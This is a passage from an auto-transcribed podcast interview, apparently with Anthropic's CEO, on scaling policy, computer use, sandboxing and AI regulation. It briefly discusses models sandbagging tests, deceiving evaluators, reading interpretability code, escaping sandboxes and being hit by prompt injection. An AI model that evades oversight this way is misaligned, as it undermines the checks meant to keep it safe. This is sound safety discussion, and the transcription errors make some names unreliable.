00:58:14.960 | shouldn't do that, that, you know, if you go to one side, you get things that
00:58:19.480 | are annoying and useless and you go to the other side, you get other behaviors.
00:58:22.520 | If you fix one thing, it creates other problems.
00:58:25.160 | We're getting better and better at solving this.
00:58:27.200 | I don't think this is an unsolvable problem.
00:58:29.440 | I think this is a, you know, this is a science like, like the safety of
00:58:32.680 | airplanes or the safety of cars or the safety of drugs, I, you know, I, I don't
00:58:36.680 | think there's any big thing we're missing.
00:58:38.640 | I just think we need to get better at controlling these models.
00:58:41.720 | And so these are, these are the two risks I'm worried about and our
00:58:44.680 | responsible scaling plan, which all recognizes a very long-winded answer
00:58:49.200 | to your question, our responsible scaling plan is designed to
00:58:53.680 | address these two types of risks.
00:58:55.960 | And so every time we develop a new model, we basically test it for its
00:59:02.120 | ability to do both of these bad things.
00:59:05.760 | So if I were to back up a little bit I think we have, I think we have an
00:59:10.600 | interesting dilemma with AI systems where they're not yet powerful enough
00:59:15.760 | to present these catastrophes.
00:59:17.960 | I don't know that, I don't know that they'll ever present,
00:59:20.360 | prevent these catastrophes.
00:59:21.400 | It's possible they won't, but the, the case for worry, the case for risk is
00:59:26.080 | strong enough that we should, we should act now and, and they're, they're
00:59:29.920 | getting better very, very fast.
00:59:31.600 | Right.
00:59:32.200 | I, you know, I testified in the Senate that, you know, we might have serious
00:59:35.800 | bio risks within two to three years.
00:59:37.520 | That was about a year ago, things have preceded, preceded a pace.
00:59:41.640 | Uh, uh, so we have this thing where it's like, it's, it's, it's surprisingly
00:59:46.400 | hard to, to address these risks because they're not here today.
00:59:50.560 | They don't exist.
00:59:51.360 | They're like ghosts, but they're coming at us so fast because the
00:59:54.320 | models are improving so fast.
00:59:55.640 | So how do you deal with something that's not here today, doesn't exist,
01:00:00.440 | but is, is coming at us very fast.
01:00:03.400 | Uh, so the solution we came up with for that in, in collaboration with, uh,
01:00:08.480 | you know, people like, uh, the organization meter and Paul Cristiano
01:00:12.520 | is okay, what, what, what you need for that are you need tests to tell
01:00:17.920 | you when the risk is getting close?
01:00:19.600 | You need an early warning system.
01:00:21.080 | And, and so every time we have a new model, we test it for its capability
01:00:26.800 | to do these CBRN tasks, as well as testing it for, you know, how capable
01:00:32.600 | it is of doing tasks autonomously on its own and, uh, in the latest
01:00:37.160 | version of our RSP, which we released in the last, in the last month
01:00:40.800 | or two, uh, the way we test autonomy risks is the model, the AI model's
01:00:46.320 | ability to do aspects of AI research itself, uh, which when the model,
01:00:51.760 | when the AI models can do AI research, they become kind of truly, truly
01:00:55.240 | autonomous, uh, and that, you know, that threshold is important
01:00:58.200 | for a bunch of other ways.
01:00:59.640 | And, and so what do we then do with these tasks?
01:01:02.800 | The RSP basically develops what we've called an if then structure,
01:01:07.920 | which is if the models pass a certain capability, then we impose a certain
01:01:14.040 | set of safety and security requirements on them.
01:01:16.440 | So today's models are what's called ASL two models that were ASL one
01:01:22.160 | is for systems that manifestly don't pose any risk of autonomy or misuse.
01:01:28.360 | So for example, a chess playing bot, deep blue would be ASL one.
01:01:32.720 | It's just manifestly the case that you can't use deep blue
01:01:36.760 | for anything other than chess.
01:01:38.080 | It was just designed for chess.
01:01:39.480 | No, one's going to use it to like, you know, to conduct a masterful
01:01:43.320 | cyber attack or to, you know, run wild and take over the world.
01:01:46.880 | ASL two is today's AI systems where we've measured them.
01:01:51.520 | And we think these systems are simply not smart enough to, uh, to, you
01:01:56.640 | know, autonomously self-replicate or conduct a bunch of tasks, uh, and
01:02:01.840 | also not smart enough to provide.
01:02:04.280 | Meaningful information about CBRN risks and how to build CBRN weapons above and
01:02:11.440 | beyond what can be known from looking at Google.
01:02:14.320 | Uh, in fact, sometimes they do provide information, but, but not above
01:02:18.840 | and beyond a search engine, but not in a way that can be stitched together.
01:02:21.880 | Um, not, not in a way that kind of end to end is dangerous enough.
01:02:26.200 | So ASL three is going to be the point at which, uh, the models are
01:02:32.120 | helpful enough to enhance the capabilities of non-state actors, right?
01:02:37.400 | State actors can already do a lot, a lot of, unfortunately, to a high
01:02:41.640 | level of proficiency, a lot of these very dangerous and destructive things.
01:02:45.480 | The difference is that non-state, non-state actors are not capable of it.
01:02:49.800 | And so when we get to ASL three, we'll take special security precautions
01:02:55.160 | designed to be sufficient to prevent theft of the model by non-state
01:02:58.920 | actors and misuse of the model as it's deployed, uh, will have to have
01:03:03.640 | enhanced filters targeted at these particular areas, cyber, bio, nuclear,
01:03:08.840 | cyber, bio, nuclear, and model autonomy, which is less a misuse risk and more
01:03:14.040 | risk of the model doing bad things itself.
01:03:16.560 | ASL four, getting to the point where these models could, could enhance the
01:03:22.880 | capability of a, of a, of a already knowledgeable state actor and, or
01:03:28.240 | become the, you know, the main source of such a risk, like if you wanted to
01:03:32.880 | engage in such a risk, the main way you would do it is through a model.
01:03:35.920 | And then I think ASL four on the autonomy side, it's, it's some, some,
01:03:40.040 | some amount of acceleration in AI research capabilities with an, with an AI
01:03:44.600 | model, and then ASL five is where we would get to the models that are, you
01:03:47.840 | know, that are, that are kind of, that are kind of, you know, truly capable
01:03:50.800 | that it could exceed humanity in their ability to do, to do any of these tasks.
01:03:54.920 | And so the, the, the point of the, if then structure commitment is, is
01:04:00.880 | basically to say, look, I don't know.
01:04:04.160 | I've been, I've been working with these models for many years and I've been
01:04:06.880 | worried about risk for many years.
01:04:08.480 | It's actually kind of dangerous to cry wolf.
01:04:11.080 | It's actually kind of dangerous to say this, you know, this, this
01:04:14.520 | model is, this model is risky.
01:04:16.720 | And you know, people look at it and they say, this is manifestly not dangerous.
01:04:20.480 | Again, it's, it's, it's the, the delicacy of the risk isn't here
01:04:25.600 | today, but it's coming at us fast.
01:04:27.560 | How do you deal with that?
01:04:28.840 | It's, it's really vexing to a risk planner to deal with it.
01:04:31.760 | And so this, if then structure basically says, look, we don't want
01:04:35.520 | to antagonize a bunch of people.
01:04:37.360 | We don't want to harm our own, you know, our, our, our kind of own
01:04:40.920 | ability to have a place in the conversation by imposing these, these.
01:04:46.320 | Very onerous burdens on models that are not dangerous today.
01:04:51.000 | So the, if then the trigger commitment is basically a way to deal with this.
01:04:54.960 | It says you clamp down hard when you can show that the model is dangerous.
01:04:58.680 | And of course, what has to come with that is, you know, enough of a buffer
01:05:01.920 | threshold that, that, you know, you can, you can, uh, you know, you're, you're,
01:05:06.200 | you're, you're not at high risk of kind of missing the danger.
01:05:08.800 | It's not a perfect framework.
01:05:10.040 | We've had to change it every, every, uh, you know, we came out with a new
01:05:14.040 | one just a few weeks ago and probably, probably going forward, we might
01:05:17.700 | release new ones multiple times a year because it's, it's hard to get these
01:05:21.320 | policies, right, like technically organizationally from a research
01:05:25.000 | perspective, but that is the proposal.
01:05:27.240 | If then commitments and triggers in order to minimize burdens and false
01:05:33.320 | alarms now, but really react appropriately when the dangers are here.
01:05:37.040 | What do you think the timeline for ASL three is where several
01:05:40.440 | of the triggers are fired?
01:05:42.080 | And what do you think the timeline is for ASL four?
01:05:44.560 | Yeah.
01:05:44.920 | So that is hotly debated within the company.
01:05:47.000 | Um, uh, we are working actively to prepare ASL three, uh, security, uh,
01:05:53.480 | security measures, as well as ASL three deployment measures.
01:05:56.840 | Um, I'm not going to go into detail, but we've made, we've
01:05:59.320 | made a lot of progress on both.
01:06:00.780 | And you know, we're, we're prepared to be, I think ready quite soon.
01:06:04.520 | Uh, I would, I would not be surprised.
01:06:07.780 | I would not be surprised at all.
01:06:09.220 | If we hit ASL three, uh, next year, there was some concern that
01:06:13.220 | we, we might even hit it, uh, this year.
01:06:15.600 | That's still, that's still possible.
01:06:16.820 | That could still happen.
01:06:17.620 | It's like very hard to say, but like, I would be very, very
01:06:21.020 | surprised if it was like 2030.
01:06:22.660 | Uh, I think it's much sooner than that.
01:06:24.700 | So there's a protocols for detecting it if then, and then there's
01:06:29.460 | protocols for how to respond to it.
01:06:31.700 | How difficult is the second, the latter?
01:06:34.740 | Yeah, I think for ASL three, it's primarily about security.
01:06:38.500 | Um, and, and about, you know, filters on the model relating to a very narrow
01:06:44.120 | set of areas when we deploy the model, because at ASL three, the model isn't
01:06:48.900 | autonomous yet, um, uh, and, and so you don't have to worry about, you know,
01:06:53.180 | kind of the model itself behaving in a bad way, even when it's deployed internally.
01:06:57.860 | So I think the ASL three measures are, are, I won't say straightforward.
01:07:02.760 | They're, they're, they're, they're rigorous, but they're easier to reason about.
01:07:05.940 | I think once we get to ASL four, um, we start to have worries about the
01:07:12.120 | models being smart enough that they might sandbag tests, they might
01:07:16.600 | not tell the truth about tests.
01:07:18.200 | Um, we had some results came out about like sleeper agents and there
01:07:21.800 | was a more recent paper about, you know, can, can the models, uh, mislead
01:07:26.920 | attempts to, you know, sandbag their own abilities, right.
01:07:30.500 | Show them, you know, uh, uh, uh, present themselves as being
01:07:33.940 | less capable than they are.
01:07:35.180 | And so I think with ASL four, there's going to be an important component
01:07:39.660 | of using other things than just interacting with the models, for
01:07:43.260 | example, interpretability or hidden chains of thought, uh, where you have
01:07:47.460 | to look inside the model and verify via some other mechanism that, that is
01:07:52.460 | not, you know, is not as easily corrupted as what the model says, uh,
01:07:56.180 | that, that, you know, that, that, that the model indeed has some property.
01:08:00.180 | Uh, so we're still working on ASL four.
01:08:02.180 | One of the properties of the RSP is that we, we don't specify
01:08:07.540 | ASL four until we've hit ASL three.
01:08:10.100 | Be, and, and I think that's proven to be a wise decision because even with ASL
01:08:14.220 | three, it, again, it's hard to know this stuff in detail and, and it, it, we
01:08:18.980 | want to take as much time as we can possibly take to get these things right.
01:08:22.900 | So for ASL three, the bad actor will be the humans, humans.
01:08:27.380 | And so there's a little bit more, um.
01:08:29.540 | For ASL four, it's both, I think it's both.
01:08:31.620 | And so deception and that's where mechanistic interpretability comes
01:08:36.020 | into play and, uh, hopefully the techniques used for that are not
01:08:40.340 | made accessible to the model.
01:08:41.740 | Yeah.
01:08:42.740 | I mean, of course you can hook up the mechanistic interpretability
01:08:45.740 | to the model itself.
01:08:46.860 | Um, but then you, then, then you, then you've kind of lost it as a
01:08:50.060 | reliable indicator of, uh, of, uh, of, of, of the model state.
01:08:54.540 | There are a bunch of exotic ways you can think of that.
01:08:56.780 | It might also not be reliable.
01:08:58.260 | Like if the, you know, model gets smart enough that it can like, you
01:09:01.660 | know, jump computers and like read the code where you're like
01:09:04.500 | looking at its internal state.
01:09:06.180 | We've thought about some of those.
01:09:07.460 | I think they're exotic enough.
01:09:08.740 | There are ways to render them unlikely, but yeah, generally you want to, you
01:09:12.460 | want to preserve mechanistic interpretability as a kind of verification
01:09:16.500 | set or test set that's separate from the training process of the model.
01:09:19.260 | See, I think, uh, as these models become better and better conversation
01:09:22.700 | and become smarter, social engineering becomes a threat too, because they,
01:09:27.140 | oh yeah, that can start being very convincing to the
01:09:29.180 | engineers inside companies.
01:09:30.580 | Oh yeah.
01:09:31.220 | Yeah.
01:09:31.740 | It's actually like, you know, we've, we've seen lots of examples of
01:09:34.540 | demagoguery in our life from humans.
01:09:36.460 | And, and, you know, there's a concern that models could do that.
01:09:38.660 | Could do that as well.
01:09:39.740 | One of the ways that cloud has been getting more and more powerful is it's
01:09:43.700 | now able to do some agentic stuff, um, computer use, uh, there's also an
01:09:49.340 | analysis within the sandbox of cloud.ai itself, but let's talk about computer use.
01:09:53.980 | That's seems to me super exciting that you can just give cloud a task and it, uh,
01:09:59.620 | it takes a bunch of actions, figures it out, and it's access to the, your
01:10:04.380 | computer through screenshots.
01:10:05.860 | So can you explain how that works, uh, and where that's headed?
01:10:10.540 | Yeah, it's actually relatively simple.
01:10:12.340 | So cloud has, has had for a long time, since, since cloud three back in March,
01:10:16.940 | the ability to analyze images and respond to them with text, the, the only new
01:10:22.060 | thing we added is those images can be screenshots of a computer and in
01:10:27.020 | response, we train the model to give a location on the screen where you can
01:10:31.340 | click and, or buttons on the keyboard.
01:10:33.860 | You can press in order to take action.
01:10:36.020 | And it turns out that with actually not all that much additional training, the
01:10:41.180 | models can get quite good at that task.
01:10:43.060 | It's a good example of generalization.
01:10:44.900 | Um, you know, people sometimes say if you get to low earth orbit, you're
01:10:48.100 | like halfway to anywhere, right?
01:10:49.280 | Because of how much it takes to escape the gravity.
01:10:51.100 | Well, if you have a strong pre-trained model, I feel like you're halfway to
01:10:54.300 | anywhere, uh, in, in terms of, in terms of the intelligence space, uh, uh, and,
01:11:00.380 | and, and so actually it didn't, it didn't take all that much to get, to
01:11:03.580 | get Claude to do this and you can just set that in a loop, give the model a
01:11:08.620 | screenshot, tell it what to click on, give it the next screenshot, tell it
01:11:11.460 | what to click on, and, and that turns into a full kind of almost, almost 3d
01:11:16.020 | video interaction of the model.
01:11:17.780 | And it's able to do all of these tasks, right?
01:11:20.300 | You know, we, we showed these demos where it's able to like
01:11:22.660 | fill out spreadsheets.
01:11:24.260 | It's able to kind of like interact with a website.
01:11:27.140 | It's able to, you know, um, you know, it's able to open all kinds of, you
01:11:31.940 | know, programs, different operating systems, windows, Linux, Mac.
01:11:35.620 | Uh, uh, so, uh, you know, I think all of that is very exciting.
01:11:39.980 | I will say while in theory, there's nothing you could do there that you
01:11:44.260 | couldn't have done through just giving the model, the API to drive the computer
01:11:47.820 | screen, uh, this really lowers the barrier and, you know, there's, there's,
01:11:52.220 | there's a lot of folks who, who, who either, you know, kind of, kind of
01:11:55.380 | aren't, aren't, you know, aren't in a position to, to interact with those
01:11:58.580 | APIs or it takes them a long time to do.
01:12:00.580 | It's just, the screen is just a universal interface.
01:12:03.060 | That's a lot easier to interact with.
01:12:04.540 | And so I expect over time, this is going to lower a bunch of barriers.
01:12:08.580 | Now, honestly, the current model has, there's, it leaves a lot still to be
01:12:12.820 | desired and we were, we were honest about that in the blog, right?
01:12:15.540 | It makes mistakes, it misclicks and we, we, you know, we were careful to
01:12:20.140 | warn people, Hey, this thing isn't, you can't just leave this thing to, you
01:12:23.500 | know, run on your computer for minutes and minutes, um, you got to give this
01:12:28.020 | thing boundaries and guardrails.
01:12:29.380 | And I think that's one of the reasons we released it first in an API form
01:12:33.180 | rather than kind of, you know, this, this kind of just, just hands it, just
01:12:36.620 | hands the consumer and give it control of their, of their, of their, of their
01:12:40.220 | computer.
01:12:40.780 | Um, but, but, you know, I definitely feel that it's important to get these
01:12:44.940 | capabilities out there as models get more powerful, we're going to have to
01:12:48.460 | grapple with, you know, how do we use these capabilities safely?
01:12:51.780 | How do we prevent them from being abused?
01:12:53.660 | Uh, and, and, you know, I think, I think releasing, releasing the model
01:12:57.540 | while, while, while the capabilities are, are, you know, are, are still, are
01:13:01.900 | still limited is, is, is very helpful in terms of, in terms of doing that.
01:13:06.220 | Um, you know, I think since it's been released, a number of customers, I
01:13:09.820 | think, uh, replete was maybe, was maybe one of the, the, the most, uh, uh,
01:13:13.820 | quickest, quickest, quickest, uh, quickest to deploy things, um, have,
01:13:18.140 | have, you know, have made use of it in various ways.
01:13:20.380 | People have hooked up demos for, you know, windows, desktops, max, uh, uh,
01:13:26.300 | you know, Linux, Linux machines.
01:13:28.260 | Uh, so yeah, it's been, it's been, it's been very exciting.
01:13:31.800 | I think as with, as with anything else, you know, it, it, it comes
01:13:35.220 | with new, exciting abilities.
01:13:37.300 | And then, then, then, you know, then, then with those new, exciting
01:13:40.180 | abilities, we have to think about how to, how to, you know, make the
01:13:42.860 | model, you know, safe, reliable, do what humans want them to do.
01:13:46.740 | I mean, it's the same, it's the same story for everything, right?
01:13:48.900 | Same thing.
01:13:49.660 | It's that same tension.
01:13:50.580 | But, but the possibility of use cases here is just the, the range is incredible.
01:13:55.080 | So, uh, how much to make it work really well in the future?
01:13:58.660 | How much do you have to specially kind of, uh, go beyond what's
01:14:03.140 | the pre-trained models doing, do more post-training, RLHF, or
01:14:06.880 | supervised fine-tuning, or synthetic data just for the agent?
01:14:10.540 | Yeah, I think speaking at a high level, it's our intention to keep
01:14:13.780 | investing a lot in, you know, making, making the model better.
01:14:16.900 | Uh, like I think, I think, uh, you know, we look at, look at some of the,
01:14:21.020 | you know, some of the benchmarks where previous models were like, oh,
01:14:23.720 | it could do it 6% of the time.
01:14:25.100 | And now our model would do it 14 or 22% of the time.
01:14:28.380 | And yeah, we want to get up to, you know, the human level reliability
01:14:31.340 | of 80, 90%, just like anywhere else, right?
01:14:33.340 | We're on the same curve that we were on with Sweebench, where I think I would
01:14:36.940 | guess a year from now, the models can do this very, very reliably,
01:14:39.740 | but you got to start somewhere.
01:14:40.700 | So you think it's possible to get to the human level, 90%, uh, basically
01:14:45.740 | doing the same thing you're doing now, or is it has to be special for computer use?
01:14:49.500 | I mean, uh, it depends what you mean by, by, you know, special and special in
01:14:54.900 | general, um, but, but I, you know, I, I generally think, you know, the same
01:14:59.660 | kinds of techniques that we've been using to train the current model.
01:15:02.460 | I, I expect that doubling down on those techniques in the same way that we
01:15:05.700 | have for code, for code, for models in general, for other kits, for, you
01:15:10.140 | know, for image input, um, uh, you know, for voice, uh, I expect those same
01:15:15.620 | techniques will scale here as they have everywhere else.
01:15:18.060 | But this is giving sort of the power of action to Claude.
01:15:22.460 | And so you could do a lot of really powerful things, but you
01:15:25.340 | could do a lot of damage also.
01:15:26.580 | Yeah.
01:15:26.860 | Yeah, no.
01:15:27.660 | And we've been very aware of that.
01:15:29.100 | Look, my, my view actually is computer use isn't a fundamentally new capability
01:15:34.860 | like the CBRN or autonomy capabilities are, um, it's more like it kind of
01:15:40.460 | opens the aperture for the model to use and apply its existing abilities.
01:15:44.500 | Uh, and, and so the way we think about it, going back to our RSP is nothing
01:15:50.260 | that this model is doing inherently increases, you know, the risk from an
01:15:56.700 | RSP RSP perspective, but as the models get more powerful, having this
01:16:01.860 | capability may make it scarier.
01:16:04.380 | Once it, you know, once it has the cognitive capability to, um, You know,
01:16:09.740 | to do something at the ASL three and ASL four level, this, this, you know,
01:16:13.980 | this may be the thing that kind of unbounds it from doing so.
01:16:17.700 | So going forward, certainly this modality of interaction is something
01:16:22.300 | that we have tested for and that we will continue to test for an RSP going forward.
01:16:26.220 | Um, I think it's probably better to have, to learn and explore this
01:16:29.620 | capability before the model is super, uh, you know, super capable.
01:16:32.780 | Yeah.
01:16:33.140 | There's a lot of interesting attacks like prompt injection, because now
01:16:36.380 | you've widened the aperture so you can prompt inject through stuff on screen.
01:16:40.460 | So if this becomes more and more useful, then there's more and more
01:16:44.460 | benefit to inject, inject stuff into the model.
01:16:47.620 | If it goes to a certain web page, it could be harmless stuff like
01:16:50.540 | advertisements, or it could be like harmful stuff, right?
01:16:53.500 | Yeah.
01:16:53.740 | I mean, we've thought a lot about things like spam, captcha, you know, mass camp.
01:16:57.820 | There's all, you know, every, every, like, if one secret, I'll tell you, if
01:17:02.220 | you've invented a new technology, not necessarily the biggest misuse, but, but
01:17:06.900 | the, the first misuse you'll see scams, just petty scams, like you'll just, just,
01:17:12.660 | just, it's, it's like, it's like a thing as old people scamming each other.
01:17:15.780 | It's, it's this, it's this thing as old as time.
01:17:18.220 | Um, and, and, and it's just every time you gotta deal with it.
01:17:21.860 | It's almost like silly to say, but it's, it's true.
01:17:24.380 | Sort of bots and spam in general is a thing as it gets more and more intelligent.
01:17:29.420 | Yeah.
01:17:29.740 | It's a harder, harder fight.
01:17:31.380 | There are a lot of, like, like I said, like there are a lot
01:17:33.260 | of petty criminals in the world.
01:17:34.580 | And, and, and, you know, it's like every new technology is like a
01:17:37.940 | new way for petty, petty criminals to do something, you know,
01:17:41.140 | something stupid and malicious.
01:17:42.620 | Uh, is there any ideas about sandboxing it?
01:17:47.260 | Like how difficult is the sandboxing task?
01:17:49.740 | Yeah.
01:17:50.340 | We sandbox during training.
01:17:51.740 | So for example, during training, we didn't expose the model to the internet.
01:17:54.620 | Um, I think that's probably a bad idea during training because, uh, you know,
01:17:58.420 | the model can be changing its policy.
01:18:00.060 | It can be changing what it's doing and it's having an effect in the real world.
01:18:02.900 | Um, uh, you know, in, in terms of actually deploying the model, right.
01:18:08.020 | It kind of depends on the application.
01:18:10.340 | Like, you know, sometimes you want the model to do something in the real world,
01:18:13.220 | but of course you can always put guard, you can always put
01:18:16.100 | guardrails on the outside, right?
01:18:17.620 | You can say, okay, well, you know, this model's not going to move data from my,
01:18:21.700 | you know, model's not going to move any files from my computer or
01:18:25.260 | my web server to anywhere else.
01:18:26.940 | Now, when you talk about sandboxing, again, when we get to ASL four, none
01:18:32.300 | of these precautions are going to make sense there, right?
01:18:35.420 | Where, when you, when you talk about ASL four, you're then the
01:18:38.700 | model is being kind of, you know, there's a theoretical worry.
01:18:42.580 | The model could be smart enough to break it, to kind of break out of any box.
01:18:46.740 | And so there, we need to think about mechanistic interpretability about,
01:18:50.820 | you know, if we're, if we're going to have a sandbox, it would need to be
01:18:53.580 | a mathematically provable sound, but you know, that's, that's a whole
01:18:57.540 | different world than what we're dealing with with the models today.
01:18:59.940 | Yeah.
01:19:02.100 | The science of building a box from which, uh, ASL four AI system cannot escape.
01:19:07.740 | I think it's probably not the right approach.
01:19:10.100 | I think the right approach instead of having something, you know, unaligned
01:19:14.220 | that, that like you're trying to prevent it from escaping, I think it's, it's
01:19:17.620 | better to just design the model the right way or have a loop where you, you know,
01:19:21.300 | you look inside, you look inside the model and you're able to verify properties.
01:19:24.980 | And that gives you a, an opportunity to like iterate and actually get it right.
01:19:28.740 | Um, I think, I think containing, uh, containing bad models is, is, is much
01:19:33.740 | worse solution than having good models.
01:19:35.180 | Let me ask about regulation.
01:19:37.220 | What's the role of regulation in keeping AI safe?
01:19:40.620 | So for example, can you describe California AI regulation bill SB 10 47
01:19:45.820 | that was ultimately vetoed by the governor?
01:19:48.300 | What are the pros and cons of this bill?
01:19:50.060 | We ended up making some suggestions to the bill and then some of those were
01:19:54.500 | adopted and, you know, we felt, I think, I think quite positively, uh, uh, quite
01:19:59.380 | positively about, about the bill, uh, by, by the end of that, um, it did still
01:20:04.220 | have some downsides, um, uh, and you know, of course, of course it got vetoed.
01:20:09.260 | Um, I think at a high level, I think some of the key ideas behind the
01:20:13.420 | bill, um, are, you know, I would say similar to ideas behind our RSPs.
01:20:17.740 | And I think it's very important that some jurisdiction, whether it's
01:20:21.420 | California or the federal government and, or other, other countries and other
01:20:25.740 | states passes some regulation like this.
01:20:28.780 | And I can talk through why I think that's so important.
01:20:31.660 | So I feel good about our RSP.
01:20:33.660 | It's not perfect.
01:20:34.700 | It needs to be iterated on a lot, but it's been a good forcing
01:20:38.660 | function for getting the company.
01:20:40.500 | To take these risks seriously, to put them into product planning, to really
01:20:45.500 | make them a central part of work at Anthropic and to make sure that all
01:20:50.060 | of a thousand people, and it's almost a thousand people now at Anthropic
01:20:52.900 | understand that this is one of the highest priorities of the company,
01:20:55.940 | if not the highest priority.
01:20:57.540 | Uh, but one, there are some, there are still some companies that don't
01:21:03.940 | have RSP like mechanisms, like open AI.
01:21:06.900 | Google, uh, did adopt these mechanisms a couple of months after, uh, after
01:21:11.460 | Anthropic did, uh, but there are, there are other companies out there that
01:21:16.140 | don't have these mechanisms at all.
01:21:17.740 | Uh, and so if some companies adopt these mechanisms and others don't, uh, it's
01:21:23.940 | really going to create a situation where, you know, some of these dangers have
01:21:27.860 | the property that it doesn't matter if three out of five of the companies are
01:21:30.900 | being safe, if the other two are, are being, are being unsafe, it
01:21:34.300 | creates this negative externality.
01:21:36.100 | And, and I think the lack of uniformity is not fair to those of us who have
01:21:39.820 | put a lot of effort into being very thoughtful about these procedures.
01:21:43.340 | The second thing is, I don't think you can trust these companies to adhere to
01:21:48.500 | these voluntary plans in their own, right?
01:21:51.060 | I like to think that Anthropic will, we do everything we can that we will.
01:21:54.980 | Our, our, our, our RSP is checked by our long-term benefit trust.
01:21:59.460 | Uh, so, you know, we do everything we can to, to, to adhere to our own RSP.
01:22:06.700 | Um, but you know, you hear lots of things about various companies saying, oh,
01:22:11.700 | they said they would do, they said they would give this much compute and they
01:22:14.260 | didn't, they said they would do this thing and they didn't, um, you know, I
01:22:17.900 | don't, I don't think it makes sense to, you know, to, to, to, you know, litigate
01:22:22.180 | particular things that companies have done, but I think this, this broad
01:22:25.580 | principle that like, if there's nothing watching over them, there's nothing
01:22:29.260 | watching over us as an industry, there's no guarantee that we'll do the right
01:22:32.980 | thing and the stakes are very high.
01:22:34.420 | Uh, and so I think it's, I think it's important to have a uniform standard
01:22:38.820 | that, that, that, that, that everyone follows and to make sure that simply
01:22:43.780 | that the industry does what a majority of the industry has already said is
01:22:48.340 | important and has already said that they definitely will do.
01:22:52.060 | Right.
01:22:52.340 | Some people, uh, you know, I think there's, there's a class of people who
01:22:55.540 | are against regulation on principle.
01:22:58.500 | I understand where that comes from.
01:23:00.060 | If you go to Europe and you know, you see something like GDPR, you see
01:23:03.660 | some of the other stuff that, that, that, that, that, that, that, that they've
01:23:06.900 | done, you know, some of it's good, but, but some of it is really unnecessarily
01:23:10.740 | burdensome and I think it's fair to say really has slowed, really has slowed
01:23:14.780 | innovation and so I understand where people are coming from on priors.
01:23:18.460 | I understand why people come from, start from that, start from that position.
01:23:22.300 | Uh, but, but again, I think AI is different.
01:23:25.380 | If we go to the very serious risks of autonomy and misuse that, that, that I
01:23:31.460 | talked about, you know, just, uh, just a few minutes ago, I think that those are
01:23:37.420 | unusual and they weren't an unusually strong response.
01:23:41.900 | Uh, and so I, I think it's very important.
01:23:44.300 | Again, um, we need something that everyone can get behind.
01:23:48.140 | Uh, you know, I think one of the issues with SB 1047, uh, especially the
01:23:54.140 | original version of it was it, it had a bunch of the structure of RSPs, but
01:24:01.340 | it also had a bunch of stuff that was either clunky or that, that, that just
01:24:06.300 | would have created a bunch of burdens, a bunch of hassle, and might even have
01:24:11.180 | missed the target in terms of addressing the risks.
01:24:14.140 | Um, you don't really hear about it on Twitter.
01:24:16.340 | You just hear about kind of, you know, people are, people are
01:24:19.260 | cheering for any regulation.
01:24:21.260 | And then the folks who are against make up these often quite intellectually
01:24:25.140 | dishonest arguments about how, you know, it, you know, it'll make
01:24:28.820 | us move away from California.
01:24:30.700 | Bill, Bill doesn't apply if you're headquartered in California, Bill only
01:24:33.980 | applies if you do business in California, um, or that it would damage the open
01:24:38.020 | source ecosystem or that it would, you know, it would cause, cause all of these
01:24:42.420 | things, I, I think those were mostly nonsense, but there are better
01:24:47.020 | arguments against regulation.
01:24:49.140 | There's one guy, uh, Dean Ball, who's really, you know, I think a very
01:24:52.500 | scholarly, scholarly analyst who, who looks at what happens when a regulation
01:24:57.220 | is put in place in ways that they can kind of get a life of their own or
01:25:01.740 | how they can be poorly designed.
01:25:03.500 | And so our interest has always been, we do think there should be regulation in
01:25:07.900 | this space, but we want to be an actor who makes sure that that, that that
01:25:13.700 | regulation is something that's surgical, that's targeted at the serious risks
01:25:18.820 | and is something people can actually comply with because something I think
01:25:22.540 | the advocates of regulation don't understand as well as they could is if
01:25:27.420 | we get something in place that is, um, that's poorly targeted, that
01:25:34.140 | wastes a bunch of people's time.
01:25:36.460 | What's going to happen is people are going to say, see these safety risks.
01:25:40.260 | There, you know, this is, this is nonsense.
01:25:43.020 | I just, you know, I just had to hire 10 lawyers to, to, you
01:25:46.020 | know, to fill out all these forums.
01:25:47.660 | I had to run all of these tests for something that was clearly not dangerous.
01:25:50.860 | And after six months of that, there will be, there will be a groundswell
01:25:54.540 | and we'll, we'll, we'll, we'll end up with a durable consensus against regulation.
01:25:58.860 | And so the, I, I think the, the worst enemy of those who want real
01:26:03.580 | accountability is badly designed regulation, um, we, we need to actually
01:26:07.700 | get it right, uh, and, and this is, if there's one thing I could say to the
01:26:11.420 | advocates, it would be that I want them to understand this dynamic better.
01:26:15.380 | And we need to be really careful and we need to talk to people who actually
01:26:18.940 | have, who actually have experience seeing how regulations play out in
01:26:23.300 | practice and, and the people who have seen that understand to be very careful.
01:26:27.700 | If this was some lesser issue, I might be against regulation at all.
01:26:31.860 | But what, what I want the opponents to understand is, is that the
01:26:36.820 | underlying issues are actually serious.
01:26:39.060 | They're, they're not, they're not something that I or the other companies
01:26:43.540 | are just making up because of regulatory capture, they're not sci-fi fantasies.
01:26:49.300 | They're not, they're not any of these things.
01:26:51.340 | Um, you know, every, every time we have a new model, every few months, we
01:26:55.940 | measure the behavior of these models and they're getting better and better at
01:26:59.940 | these concerning tasks, just as they are getting better and better at, um, you
01:27:05.180 | know, good, valuable, economically useful tasks, and so I, I, I would just love
01:27:11.220 | it if some of the former, you know, I think SB 1047 was very polarizing.
01:27:16.100 | I would love it if some of the most reasonable opponents and some of the
01:27:21.580 | most reasonable, um, uh, proponents, uh, would sit down together and, you know,
01:27:28.420 | I think, I think that, you know, the different, the different AI companies,
01:27:31.460 | um, you know, Anthropic was the, the only AI company that, you know, felt
01:27:36.580 | positively in a very detailed way.
01:27:38.060 | I think Elon tweeted, uh, tweeted briefly something positive, but, you know, some
01:27:42.860 | of the, some of the big ones like Google, OpenAI, Meta, Microsoft were,
01:27:47.140 | were pretty staunch, staunchly against.
01:27:48.980 | So I would really like is if, if, you know, some of the key stakeholders,
01:27:52.820 | some of the, you know, most thoughtful proponents and, and some of the most
01:27:56.180 | thoughtful opponents would sit down and say, how do we solve this problem in, in
01:28:01.180 | a way that the proponents feel brings a real reduction in risk and that the
01:28:07.100 | opponents feel that it is not, it is not hampering the, the industry or hampering
01:28:13.460 | innovation any more necessary than it, than it, than it, than it, than it needs
01:28:17.660 | to, and, and I think for, for whatever reason that things got too polarized and
01:28:23.220 | those two groups didn't get to sit down in the way that they should.
01:28:26.700 | Uh, and, and I feel, I feel urgency.
01:28:29.100 | I really think we need to do something in 2025.
01:28:31.540 | Uh, uh, you know, if we get to the end of 2025 and we've still done nothing
01:28:36.460 | about this, then I'm going to be worried.
01:28:38.420 | I'm not, I'm not worried yet because again, the risks aren't here yet, but,
01:28:42.620 | but I, I think time is running short.
01:28:44.380 | Yeah.
01:28:44.700 | And come up with something surgical, like you said.
